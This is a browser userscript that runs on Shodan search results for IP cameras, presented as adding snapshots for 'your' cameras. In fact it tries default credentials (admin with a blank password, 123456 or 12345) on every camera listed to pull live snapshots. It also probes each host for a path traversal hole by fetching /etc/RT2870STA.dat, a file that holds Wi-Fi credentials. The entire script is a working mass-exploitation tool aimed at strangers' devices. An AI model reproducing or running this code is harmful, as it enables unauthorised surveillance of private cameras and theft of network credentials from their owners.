Shodan Cam Helper

Adds snapshots for your IP cameras
换行
// ==UserScript==
// @name         Shodan Cam Helper
// @namespace    http://ebaumsworld.com/
// @version      0.1
// @description  Adds snapshots for your IP cameras
// @author       joe
// @match        https://www.shodan.io/search?query*
// @grant        GM_xmlhttpRequest
// ==/UserScript==
var ENABLED_LOGGABLE_VIDEOSTREAM = false;
var ENABLED_SNAPSHOT = true;
var ENABLED_TRAVERSAL = true;
var IPs = [
];
var TIMEOUT_IN_MS = 2000;
addCredentials = function (type, username, password, url)
{
  if (type == 1)
  { // add at http
    return url.replace('http://', 'http://' + username + ':' + password + '@');
  } 
  else
  {
    if (url.indexOf('?') > 0)
    {
      url += '&';
    } 
    else
    {
      url += '?';
    }
    return url + 'user=' + username + '&pwd=' + password;
  }
}
var shodanIPs = document.getElementsByClassName('ip');
var i = 0;
for (i = 0; i < shodanIPs.length; i++)
{
  var url = shodanIPs[i].getElementsByTagName('a') [0].href;
  var videostream = addCredentials(1, 'admin', '', url + 'videostream.cgi');
  var snapshot = addCredentials(2, 'admin', '', url + 'snapshot.cgi');
  var snapshot2 = addCredentials(2, 'admin', '123456', url + 'snapshot.cgi');
  var snapshot3 = addCredentials(2, 'admin', '12345', url + 'snapshot.cgi');
  //var traversalCheck = url + "//etc/RT2870STA.dat";
  var addition = '<br />';
  if (ENABLED_LOGGABLE_VIDEOSTREAM)
  {
    addition += 'Loggable: <img src="' + videostream + '" /><br />';
  }
  if (ENABLED_SNAPSHOT)
  {
    addition += '<img onerror=\'this.style.display = "none"\' src="' + snapshot + '" /><br />';
    addition += '<img onerror=\'this.style.display = "none"\' src="' + snapshot2 + '" /><br />';
    addition += '<img onerror=\'this.style.display = "none"\' src="' + snapshot3 + '" /><br />';
  }
  if (ENABLED_TRAVERSAL)
  {
    addition += '<div class="' + url + '"> </div>';
    IPs.unshift(url);
  }
  shodanIPs[i].innerHTML += addition;
}
function checkVulnerability()
{
  if (IPs.length > 0)
  {
    var currentIP = IPs.pop();
    GM_xmlhttpRequest({
      url: currentIP + '/etc/RT2870STA.dat',
      method: 'GET',
      onload: function (response) {
        var text = '';
        if (response.status == '200')
        {
          text = '<b><u>Vulnerable to //proc/kcore!</u></b>';
        } 
        else
        {
          text = 'Not vulnerable?';
        }
        document.getElementsByClassName(currentIP) [0].innerHTML = text;
        checkVulnerability();
      },
      timeout: TIMEOUT_IN_MS,
      ontimeout: function () {
        var text = 'Request timed out (Is site up?)';
        document.getElementsByClassName(currentIP) [0].innerHTML = text;
        checkVulnerability();
      }
    });
  }
}
checkVulnerability();